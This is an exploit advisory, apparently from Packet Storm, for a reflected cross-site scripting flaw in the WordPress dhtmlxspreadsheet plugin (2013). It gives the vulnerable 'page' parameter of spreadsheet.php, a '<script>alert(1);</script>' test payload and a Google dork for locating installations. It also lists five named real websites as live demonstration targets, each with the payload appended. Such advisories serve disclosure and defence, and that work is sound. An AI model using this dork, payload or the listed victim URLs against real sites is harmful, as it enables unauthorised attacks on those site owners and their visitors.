WordPress dhtmlxspreadsheet plugin suffers from a cross site scripting vulnerability. Note that this advisory has site-specific information.
9c022914100845000fa4e2d8dad503895b745e6e90efe3d949f88a3e69849a8c#********************************************************************************
# Exploit Title : Wordpress spreadsheet Plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://wordpress.org
#
# Software Link :
http://downloads.wordpress.org/plugin/dhtmlxspreadsheet.2.0.zip
#
# Google Dork : inurl :wp-content/plugins/dhtmlxspreadsheet
#
# Date: 2013/10/18
#
# Tested on: Windows 7 , Linux
-------------------------------------------------------------------
# Exploit : Cross site scripting
#
# Location :
[Target]/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=[xss]
#
# Script For Test : <script>alert(1);</script>
######################
# Demo:
#
#
http://www.artsarben.com/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=
<script>alert(1);</script>
#
#
http://www.chesterbowl.org/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=
<script>alert(1);</script>
#
#
http://www.homelinkamerica.com/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=
<script>alert(1);</script>
#
#
http://www.meloda.org/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=
<script>alert(1);</script>
#
#
http://www.womeninediscovery.org/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=
<script>alert(1);</script>
#
######################
discovered by : ACC3SS
######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed